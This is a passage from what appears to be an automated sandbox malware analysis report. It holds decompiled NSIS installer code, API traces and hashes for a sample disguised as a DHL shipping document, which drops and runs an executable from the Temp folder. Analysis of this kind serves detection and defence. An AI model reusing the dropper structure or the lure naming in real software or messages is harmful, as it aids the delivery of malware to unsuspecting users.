								}
								__eflags =  *0x42922c;
								if( *0x42922c == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x423728, 5); // executed
							_t39 = E004069C5("RichEd20"); // executed
							__eflags = _t39;
							if(_t39 == 0) {
								E004069C5("RichEd32");
							}
							_t87 = L"RichEdit20W";
							_t40 = GetClassInfoW(0, _t87, 0x429200);
							__eflags = _t40;
							if(_t40 == 0) {
								GetClassInfoW(0, L"RichEdit", 0x429200);
								 *0x429224 = _t87;
								RegisterClassW(0x429200);
							}
							_t44 = DialogBoxParamW( *0x42a260,  *0x429240 + 0x00000069 & 0x0000ffff, 0, E004040C5, 0); // executed
							E00403C67(E0040140B(5), 1);
							return _t44;
						}
						L22:
						_t36 = 2;
						return _t36;
					} else {
						_t78 =  *0x42a260;
						 *0x429204 = E00401000;
						 *0x429210 =  *0x42a260;
						 *0x429214 = _t30;
						 *0x429224 = 0x40a3b4;
						if(RegisterClassW(0x429200) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoW(0x30, 0,  &_v16, 0);
						 *0x423728 = CreateWindowExW(0x80, 0x40a3b4, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42a260, 0);
						goto L21;
					}
				} else {
					_t78 =  *(_t82 + 0x48);
					_t92 = _t78;
					if(_t78 == 0) {
						goto L16;
					}
					_t76 = 0x428200;
					E00406536(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x42a298 + _t78 * 2,  *0x42a298 +  *(_t82 + 0x4c) * 2, 0x428200, 0);
					_t63 =  *0x428200; // 0x22
					if(_t63 == 0) {
						goto L16;
					}
					if(_t63 == 0x22) {
						_t76 = 0x428202;
						 *((short*)(E00405F64(0x428202, 0x22))) = 0;
					}
					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
						L15:
						E00406668(_t86, E00405F37(_t76));
						goto L16;
					} else {
						_t69 = GetFileAttributesW(_t76);
						if(_t69 == 0xffffffff) {
							L14:
							E00405F83(_t76);
							goto L15;
						}
						_t98 = _t69 & 0x00000010;
						if((_t69 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}
























                                                              0x00403d1d
                                                              0x00403d26
                                                              0x00403d2d
                                                              0x00403d2f
                                                              0x00403d43
                                                              0x00403d55
                                                              0x00403d5e
                                                              0x00403d67
                                                              0x00403d6e
                                                              0x00403d73
                                                              0x00403d7a
                                                              0x00403d8d
                                                              0x00403d8d
                                                              0x00403d98
                                                              0x00403d31
                                                              0x00403d3c
                                                              0x00403d3c
                                                              0x00403d9d
                                                              0x00403da7
                                                              0x00403db0
                                                              0x00403db5
                                                              0x00403dc6
                                                              0x00403e58
                                                              0x00403e60
                                                              0x00403e69
                                                              0x00403e69
                                                              0x00403e7f
                                                              0x00403e85
                                                              0x00403e93
                                                              0x00403f14
                                                              0x00403f1c
                                                              0x00403f26
                                                              0x00403f2b
                                                              0x00403f31
                                                              0x00403fbb
                                                              0x00403fc0
                                                              0x00403fc2
                                                              0x00403fde
                                                              0x00000000
                                                              0x00403fde
                                                              0x00403fc4
                                                              0x00403fca
                                                              0x00403fd2
                                                              0x00403fd2
                                                              0x00000000
                                                              0x00403fca
                                                              0x00403f3f
                                                              0x00403f4a
                                                              0x00403f4f
                                                              0x00403f51
                                                              0x00403f58
                                                              0x00403f58
                                                              0x00403f63
                                                              0x00403f6b
                                                              0x00403f6d
                                                              0x00403f6f
                                                              0x00403f78
                                                              0x00403f7b
                                                              0x00403f81
                                                              0x00403f81
                                                              0x00403fa0
                                                              0x00403fb1
                                                              0x00000000
                                                              0x00403fb6
                                                              0x00403f1e
                                                              0x00403f20
                                                              0x00000000
                                                              0x00403e95
                                                              0x00403e95
                                                              0x00403ea1
                                                              0x00403eab
                                                              0x00403eb1
                                                              0x00403eb6
                                                              0x00403ec5
                                                              0x00403fe3
                                                              0x00403fe3
                                                              0x00000000
                                                              0x00403fe3
                                                              0x00403ed4
                                                              0x00403f0f
                                                              0x00000000
                                                              0x00403f0f
                                                              0x00403dcc
                                                              0x00403dcc
                                                              0x00403dcf
                                                              0x00403dd1
                                                              0x00000000
                                                              0x00000000
                                                              0x00403ddf
                                                              0x00403df1
                                                              0x00403df6
                                                              0x00403dff
                                                              0x00000000
                                                              0x00000000
                                                              0x00403e05
                                                              0x00403e07
                                                              0x00403e14
                                                              0x00403e14
                                                              0x00403e1d
                                                              0x00403e23
                                                              0x00403e4b
                                                              0x00403e53
                                                              0x00000000
                                                              0x00403e35
                                                              0x00403e36
                                                              0x00403e3f
                                                              0x00403e45
                                                              0x00403e46
                                                              0x00000000
                                                              0x00403e46
                                                              0x00403e41
                                                              0x00403e43
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00403e43
                                                              0x00403e23

                                                              APIs
                                                                • Part of subcall function 00406A35: GetModuleHandleA.KERNEL32(?,00000020,?,00403750,0000000B), ref: 00406A47
                                                                • Part of subcall function 00406A35: GetProcAddress.KERNEL32(00000000,?), ref: 00406A62
                                                              • lstrcatW.KERNEL32(1033,00423748), ref: 00403D98
                                                              • lstrlenW.KERNEL32("C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe" C:\Users\user\AppData\Local\Temp\lfcykkdw.xwy,?,?,?,"C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe" C:\Users\user\AppData\Local\Temp\lfcykkdw.xwy,00000000,C:\Users\user\AppData\Local\Temp,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000,00000002,7476FAA0), ref: 00403E18
                                                              • lstrcmpiW.KERNEL32(?,.exe,"C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe" C:\Users\user\AppData\Local\Temp\lfcykkdw.xwy,?,?,?,"C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe" C:\Users\user\AppData\Local\Temp\lfcykkdw.xwy,00000000,C:\Users\user\AppData\Local\Temp,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000), ref: 00403E2B
                                                              • GetFileAttributesW.KERNEL32("C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe" C:\Users\user\AppData\Local\Temp\lfcykkdw.xwy,?,00000000,?), ref: 00403E36
                                                              • LoadImageW.USER32 ref: 00403E7F
                                                                • Part of subcall function 004065AF: wsprintfW.USER32 ref: 004065BC
                                                              • RegisterClassW.USER32 ref: 00403EBC
                                                              • SystemParametersInfoW.USER32 ref: 00403ED4
                                                              • CreateWindowExW.USER32 ref: 00403F09
                                                              • ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403F3F
                                                              • GetClassInfoW.USER32 ref: 00403F6B
                                                              • GetClassInfoW.USER32 ref: 00403F78
                                                              • RegisterClassW.USER32 ref: 00403F81
                                                              • DialogBoxParamW.USER32 ref: 00403FA0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.325407828.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.325399231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325416433.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000047D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_DHL_SHIPPING_DOCUMENT.jbxd
                                                              Similarity
                                                              • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                              • String ID: "C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe" C:\Users\user\AppData\Local\Temp\lfcykkdw.xwy$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$H7B$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                              • API String ID: 1975747703-1017205349
                                                              • Opcode ID: 53155da091c4b3d7a5df89bad193350c55a8525543a5f9d2669ac1eab67f041a
                                                              • Instruction ID: e235badc60aeba35c86cf297cd954ec43a22164425911800af60bc979c7621a1
                                                              • Opcode Fuzzy Hash: 53155da091c4b3d7a5df89bad193350c55a8525543a5f9d2669ac1eab67f041a
                                                              • Instruction Fuzzy Hash: E661D570640201BAD730AF66AD45E2B3A7CEB84B49F40457FF945B22E1DB3D5911CA3D
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 004030D0 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 204memoryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 322 4030d0-40311e GetTickCount GetModuleFileNameW call 406158 325 403120-403125 322->325 326 40312a-403158 call 406668 call 405f83 call 406668 GetFileSize 322->326 327 40336a-40336e 325->327 334 403243-403251 call 40302e 326->334 335 40315e 326->335 341 403322-403327 334->341 342 403257-40325a 334->342 337 403163-40317a 335->337 339 40317c 337->339 340 40317e-403187 call 4035e2 337->340 339->340 348 40318d-403194 340->348 349 4032de-4032e6 call 40302e 340->349 341->327 344 403286-4032d2 GlobalAlloc call 406b90 call 406187 CreateFileW 342->344 345 40325c-403274 call 4035f8 call 4035e2 342->345 373 4032d4-4032d9 344->373 374 4032e8-403318 call 4035f8 call 403371 344->374 345->341 368 40327a-403280 345->368 353 403210-403214 348->353 354 403196-4031aa call 406113 348->354 349->341 358 403216-40321d call 40302e 353->358 359 40321e-403224 353->359 354->359 371 4031ac-4031b3 354->371 358->359 364 403233-40323b 359->364 365 403226-403230 call 406b22 359->365 364->337 372 403241 364->372 365->364 368->341 368->344 371->359 377 4031b5-4031bc 371->377 372->334 373->327 383 40331d-403320 374->383 377->359 379 4031be-4031c5 377->379 379->359 380 4031c7-4031ce 379->380 380->359 382 4031d0-4031f0 380->382 382->341 384 4031f6-4031fa 382->384 383->341 385 403329-40333a 383->385 386 403202-40320a 384->386 387 4031fc-403200 384->387 388 403342-403347 385->388 389 40333c 385->389 386->359 390 40320c-40320e 386->390 387->372 387->386 391 403348-40334e 388->391 389->388 390->359 391->391 392 403350-403368 call 406113 391->392 392->327
                                                              C-Code - Quality: 98%
                                                              			E004030D0(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				short _v560;
				long _t54;
				void* _t57;
				void* _t62;
				intOrPtr _t65;
				void* _t68;
				intOrPtr* _t70;
				long _t82;
				signed int _t89;
				intOrPtr _t92;
				long _t94;
				void* _t102;
				void* _t106;
				long _t107;
				long _t110;
				void* _t111;

				_t94 = 0;
				_v8 = 0;
				_v12 = 0;
				 *0x42a26c = GetTickCount() + 0x3e8;
				GetModuleFileNameW(0, L"C:\\Users\\jones\\Desktop\\DHL_SHIPPING_DOCUMENT.exe", 0x400);
				_t106 = E00406158(L"C:\\Users\\jones\\Desktop\\DHL_SHIPPING_DOCUMENT.exe", 0x80000000, 3);
				 *0x40a018 = _t106;
				if(_t106 == 0xffffffff) {
					return L"Error launching installer";
				}
				E00406668(L"C:\\Users\\jones\\Desktop", L"C:\\Users\\jones\\Desktop\\DHL_SHIPPING_DOCUMENT.exe");
				E00406668(0x439000, E00405F83(L"C:\\Users\\jones\\Desktop"));
				_t54 = GetFileSize(_t106, 0);
				 *0x420f00 = _t54;
				_t110 = _t54;
				if(_t54 <= 0) {
					L24:
					E0040302E(1);
					if( *0x42a274 == _t94) {
						goto L32;
					}
					if(_v12 == _t94) {
						L28:
						_t57 = GlobalAlloc(0x40, _v20); // executed
						_t111 = _t57;
						E00406B90(0x40ce68);
						E00406187(0x40ce68,  &_v560, L"C:\\Users\\jones\\AppData\\Local\\Temp\\"); // executed
						_t62 = CreateFileW( &_v560, 0xc0000000, _t94, _t94, 2, 0x4000100, _t94); // executed
						 *0x40a01c = _t62;
						if(_t62 != 0xffffffff) {
							_t65 = E004035F8( *0x42a274 + 0x1c);
							 *0x420f04 = _t65;
							 *0x420ef8 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
							_t68 = E00403371(_v16, 0xffffffff, _t94, _t111, _v20); // executed
							if(_t68 == _v20) {
								 *0x42a270 = _t111;
								 *0x42a278 =  *_t111;
								if((_v40 & 0x00000001) != 0) {
									 *0x42a27c =  *0x42a27c + 1;
								}
								_t45 = _t111 + 0x44; // 0x44
								_t70 = _t45;
								_t102 = 8;
								do {
									_t70 = _t70 - 8;
									 *_t70 =  *_t70 + _t111;
									_t102 = _t102 - 1;
								} while (_t102 != 0);
								 *((intOrPtr*)(_t111 + 0x3c)) =  *0x420ef4;
								E00406113(0x42a280, _t111 + 4, 0x40);
								return 0;
							}
							goto L32;
						}
						return L"Error writing temporary file. Make sure your temp folder is valid.";
					}
					E004035F8( *0x420ef0);
					if(E004035E2( &_a4, 4) == 0 || _v8 != _a4) {
						goto L32;
					} else {
						goto L28;
					}
				} else {
					do {
						_t107 = _t110;
						asm("sbb eax, eax");
						_t82 = ( ~( *0x42a274) & 0x00007e00) + 0x200;
						if(_t110 >= _t82) {
							_t107 = _t82;
						}
						if(E004035E2(0x418ef0, _t107) == 0) {
							E0040302E(1);
							L32:
							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						if( *0x42a274 != 0) {
							if((_a4 & 0x00000002) == 0) {
								E0040302E(0);
							}
							goto L20;
						}
						E00406113( &_v40, 0x418ef0, 0x1c);
						_t89 = _v40;
						if((_t89 & 0xfffffff0) == 0 && _v36 == 0xdeadbeef && _v24 == 0x74736e49 && _v28 == 0x74666f73 && _v32 == 0x6c6c754e) {
							_a4 = _a4 | _t89;
							 *0x42a300 =  *0x42a300 | _a4 & 0x00000002;
							_t92 = _v16;
							 *0x42a274 =  *0x420ef0;
							if(_t92 > _t110) {
								goto L32;
							}
							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
								_v12 = _v12 + 1;
								_t110 = _t92 - 4;
								if(_t107 > _t110) {
									_t107 = _t110;
								}
								goto L20;
							} else {
								break;
							}
						}
						L20:
						if(_t110 <  *0x420f00) {
							_v8 = E00406B22(_v8, 0x418ef0, _t107);
						}
						 *0x420ef0 =  *0x420ef0 + _t107;
						_t110 = _t110 - _t107;
					} while (_t110 != 0);
					_t94 = 0;
					goto L24;
				}
			}




























                                                              0x004030db
                                                              0x004030de
                                                              0x004030e1
                                                              0x004030fb
                                                              0x00403100
                                                              0x00403113
                                                              0x00403118
                                                              0x0040311e
                                                              0x00000000
                                                              0x00403120
                                                              0x00403131
                                                              0x00403142
                                                              0x00403149
                                                              0x00403151
                                                              0x00403156
                                                              0x00403158
                                                              0x00403243
                                                              0x00403245
                                                              0x00403251
                                                              0x00000000
                                                              0x00000000
                                                              0x0040325a
                                                              0x00403286
                                                              0x0040328b
                                                              0x00403296
                                                              0x00403298
                                                              0x004032a9
                                                              0x004032c4
                                                              0x004032cd
                                                              0x004032d2
                                                              0x004032f1
                                                              0x00403301
                                                              0x00403313
                                                              0x00403318
                                                              0x00403320
                                                              0x0040332d
                                                              0x00403335
                                                              0x0040333a
                                                              0x0040333c
                                                              0x0040333c
                                                              0x00403344
                                                              0x00403344
                                                              0x00403347
                                                              0x00403348
                                                              0x00403348
                                                              0x0040334b
                                                              0x0040334d
                                                              0x0040334d
                                                              0x00403357
                                                              0x00403363
                                                              0x00000000
                                                              0x00403368
                                                              0x00000000
                                                              0x00403320
                                                              0x00000000
                                                              0x004032d4
                                                              0x00403262
                                                              0x00403274
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x0040315e
                                                              0x00403163
                                                              0x00403168
                                                              0x0040316c
                                                              0x00403173
                                                              0x0040317a
                                                              0x0040317c
                                                              0x0040317c
                                                              0x00403187
                                                              0x004032e0
                                                              0x00403322
                                                              0x00000000
                                                              0x00403322
                                                              0x00403194
                                                              0x00403214
                                                              0x00403218
                                                              0x0040321d
                                                              0x00000000
                                                              0x00403214
                                                              0x0040319d
                                                              0x004031a2
                                                              0x004031aa
                                                              0x004031d0
                                                              0x004031df
                                                              0x004031e5
                                                              0x004031ea
                                                              0x004031f0
                                                              0x00000000
                                                              0x00000000
                                                              0x004031fa
                                                              0x00403202
                                                              0x00403205
                                                              0x0040320a
                                                              0x0040320c
                                                              0x0040320c
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x004031fa
                                                              0x0040321e
                                                              0x00403224
                                                              0x00403230
                                                              0x00403230
                                                              0x00403233
                                                              0x00403239
                                                              0x00403239
                                                              0x00403241
                                                              0x00000000
                                                              0x00403241

                                                              APIs
                                                              • GetTickCount.KERNEL32 ref: 004030E4
                                                              • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\DHL_SHIPPING_DOCUMENT.exe,00000400), ref: 00403100
                                                                • Part of subcall function 00406158: GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\DHL_SHIPPING_DOCUMENT.exe,80000000,00000003), ref: 0040615C
                                                                • Part of subcall function 00406158: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                                                              • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\DHL_SHIPPING_DOCUMENT.exe,C:\Users\user\Desktop\DHL_SHIPPING_DOCUMENT.exe,80000000,00000003), ref: 00403149
                                                              • GlobalAlloc.KERNELBASE(00000040,?), ref: 0040328B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.325407828.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.325399231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325416433.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000047D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_DHL_SHIPPING_DOCUMENT.jbxd
                                                              Similarity
                                                              • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                              • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\DHL_SHIPPING_DOCUMENT.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                              • API String ID: 2803837635-1193362503
                                                              • Opcode ID: 0724999653b3e73eed60d379075ff5ac069807c872a81a0186dc1bcbf61f2663
                                                              • Instruction ID: 6a7077609e6cbe8902eef3654a796be60faa9129f620d49927b75729aeb44cd1
                                                              • Opcode Fuzzy Hash: 0724999653b3e73eed60d379075ff5ac069807c872a81a0186dc1bcbf61f2663
                                                              • Instruction Fuzzy Hash: 74710271A40204ABDB20DFB5DD85B9E3AACAB04315F21457FF901B72D2CB789E418B6D
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0040176F Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 145stringtimeCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 459 40176f-401794 call 402da6 call 405fae 464 401796-40179c call 406668 459->464 465 40179e-4017b0 call 406668 call 405f37 lstrcatW 459->465 470 4017b5-4017b6 call 4068ef 464->470 465->470 474 4017bb-4017bf 470->474 475 4017c1-4017cb call 40699e 474->475 476 4017f2-4017f5 474->476 483 4017dd-4017ef 475->483 484 4017cd-4017db CompareFileTime 475->484 477 4017f7-4017f8 call 406133 476->477 478 4017fd-401819 call 406158 476->478 477->478 486 40181b-40181e 478->486 487 40188d-4018b6 call 4056ca call 403371 478->487 483->476 484->483 488 401820-40185e call 406668 * 2 call 4066a5 call 406668 call 405cc8 486->488 489 40186f-401879 call 4056ca 486->489 499 4018b8-4018bc 487->499 500 4018be-4018ca SetFileTime 487->500 488->474 521 401864-401865 488->521 501 401882-401888 489->501 499->500 503 4018d0-4018db FindCloseChangeNotification 499->503 500->503 504 402c33 501->504 506 4018e1-4018e4 503->506 507 402c2a-402c2d 503->507 508 402c35-402c39 504->508 511 4018e6-4018f7 call 4066a5 lstrcatW 506->511 512 4018f9-4018fc call 4066a5 506->512 507->504 518 401901-4023a2 call 405cc8 511->518 512->518 518->507 518->508 521->501 523 401867-401868 521->523 523->489
                                                              C-Code - Quality: 77%
                                                              			E0040176F(FILETIME* __ebx, void* __eflags) {
				void* __esi;
				void* _t35;
				void* _t43;
				void* _t45;
				FILETIME* _t51;
				FILETIME* _t64;
				void* _t66;
				signed int _t72;
				FILETIME* _t73;
				FILETIME* _t77;
				signed int _t79;
				WCHAR* _t81;
				void* _t83;
				void* _t84;
				void* _t86;

				_t77 = __ebx;
				 *(_t86 - 8) = E00402DA6(0x31);
				 *(_t86 + 8) =  *(_t86 - 0x30) & 0x00000007;
				_t35 = E00405FAE( *(_t86 - 8));
				_push( *(_t86 - 8));
				_t81 = L"\"C:\\";
				if(_t35 == 0) {
					lstrcatW(E00405F37(E00406668(_t81, L"C:\\Users\\jones\\AppData\\Local\\Temp")), ??);
				} else {
					E00406668();
				}
				E004068EF(_t81);
				while(1) {
					__eflags =  *(_t86 + 8) - 3;
					if( *(_t86 + 8) >= 3) {
						_t66 = E0040699E(_t81);
						_t79 = 0;
						__eflags = _t66 - _t77;
						if(_t66 != _t77) {
							_t73 = _t66 + 0x14;
							__eflags = _t73;
							_t79 = CompareFileTime(_t73, _t86 - 0x24);
						}
						asm("sbb eax, eax");
						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
						__eflags = _t72;
						 *(_t86 + 8) = _t72;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) == _t77) {
						E00406133(_t81);
					}
					__eflags =  *(_t86 + 8) - 1;
					_t43 = E00406158(_t81, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
					__eflags = _t43 - 0xffffffff;
					 *(_t86 - 0x38) = _t43;
					if(_t43 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) != _t77) {
						E004056CA(0xffffffe2,  *(_t86 - 8));
						__eflags =  *(_t86 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t86 - 4)) = 1;
						}
						L31:
						 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t86 - 4));
						__eflags =  *0x42a2e8;
						goto L32;
					} else {
						E00406668(0x40b5f8, _t83);
						E00406668(_t83, _t81);
						E004066A5(_t77, _t81, _t83, "C:\Users\jones\AppData\Local\Temp",  *((intOrPtr*)(_t86 - 0x1c)));
						E00406668(_t83, 0x40b5f8);
						_t64 = E00405CC8("C:\Users\jones\AppData\Local\Temp",  *(_t86 - 0x30) >> 3) - 4;
						__eflags = _t64;
						if(_t64 == 0) {
							continue;
						} else {
							__eflags = _t64 == 1;
							if(_t64 == 1) {
								 *0x42a2e8 =  &( *0x42a2e8->dwLowDateTime);
								L32:
								_t51 = 0;
								__eflags = 0;
							} else {
								_push(_t81);
								_push(0xfffffffa);
								E004056CA();
								L29:
								_t51 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t51;
				}
				E004056CA(0xffffffea,  *(_t86 - 8));
				 *0x42a314 =  *0x42a314 + 1;
				_t45 = E00403371(_t79,  *((intOrPtr*)(_t86 - 0x28)),  *(_t86 - 0x38), _t77, _t77); // executed
				 *0x42a314 =  *0x42a314 - 1;
				__eflags =  *(_t86 - 0x24) - 0xffffffff;
				_t84 = _t45;
				if( *(_t86 - 0x24) != 0xffffffff) {
					L22:
					SetFileTime( *(_t86 - 0x38), _t86 - 0x24, _t77, _t86 - 0x24); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t86 - 0x20)) - 0xffffffff;
					if( *((intOrPtr*)(_t86 - 0x20)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t86 - 0x38)); // executed
				__eflags = _t84 - _t77;
				if(_t84 >= _t77) {
					goto L31;
				} else {
					__eflags = _t84 - 0xfffffffe;
					if(_t84 != 0xfffffffe) {
						E004066A5(_t77, _t81, _t84, _t81, 0xffffffee);
					} else {
						E004066A5(_t77, _t81, _t84, _t81, 0xffffffe9);
						lstrcatW(_t81,  *(_t86 - 8));
					}
					_push(0x200010);
					_push(_t81);
					E00405CC8();
					goto L29;
				}
				goto L33;
			}


















                                                              0x0040176f
                                                              0x00401776
                                                              0x00401782
                                                              0x00401785
                                                              0x0040178a
                                                              0x0040178d
                                                              0x00401794
                                                              0x004017b0
                                                              0x00401796
                                                              0x00401797
                                                              0x00401797
                                                              0x004017b6
                                                              0x004017bb
                                                              0x004017bb
                                                              0x004017bf
                                                              0x004017c2
                                                              0x004017c7
                                                              0x004017c9
                                                              0x004017cb
                                                              0x004017d0
                                                              0x004017d0
                                                              0x004017db
                                                              0x004017db
                                                              0x004017ec
                                                              0x004017ee
                                                              0x004017ee
                                                              0x004017ef
                                                              0x004017ef
                                                              0x004017f2
                                                              0x004017f5
                                                              0x004017f8
                                                              0x004017f8
                                                              0x004017ff
                                                              0x0040180e
                                                              0x00401813
                                                              0x00401816
                                                              0x00401819
                                                              0x00000000
                                                              0x00000000
                                                              0x0040181b
                                                              0x0040181e
                                                              0x00401874
                                                              0x00401879
                                                              0x004015b6
                                                              0x0040292e
                                                              0x0040292e
                                                              0x00402c2a
                                                              0x00402c2d
                                                              0x00402c2d
                                                              0x00000000
                                                              0x00401820
                                                              0x00401826
                                                              0x0040182d
                                                              0x0040183a
                                                              0x00401845
                                                              0x0040185b
                                                              0x0040185b
                                                              0x0040185e
                                                              0x00000000
                                                              0x00401864
                                                              0x00401864
                                                              0x00401865
                                                              0x00401882
                                                              0x00402c33
                                                              0x00402c33
                                                              0x00402c33
                                                              0x00401867
                                                              0x00401867
                                                              0x00401868
                                                              0x00401493
                                                              0x0040239d
                                                              0x0040239d
                                                              0x0040239d
                                                              0x00401865
                                                              0x0040185e
                                                              0x00402c35
                                                              0x00402c39
                                                              0x00402c39
                                                              0x00401892
                                                              0x00401897
                                                              0x004018a5
                                                              0x004018aa
                                                              0x004018b0
                                                              0x004018b4
                                                              0x004018b6
                                                              0x004018be
                                                              0x004018ca
                                                              0x004018b8
                                                              0x004018b8
                                                              0x004018bc
                                                              0x00000000
                                                              0x00000000
                                                              0x004018bc
                                                              0x004018d3
                                                              0x004018d9
                                                              0x004018db
                                                              0x00000000
                                                              0x004018e1
                                                              0x004018e1
                                                              0x004018e4
                                                              0x004018fc
                                                              0x004018e6
                                                              0x004018e9
                                                              0x004018f2
                                                              0x004018f2
                                                              0x00401901
                                                              0x00401906
                                                              0x00402398
                                                              0x00000000
                                                              0x00402398
                                                              0x00000000

                                                              APIs
                                                              • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
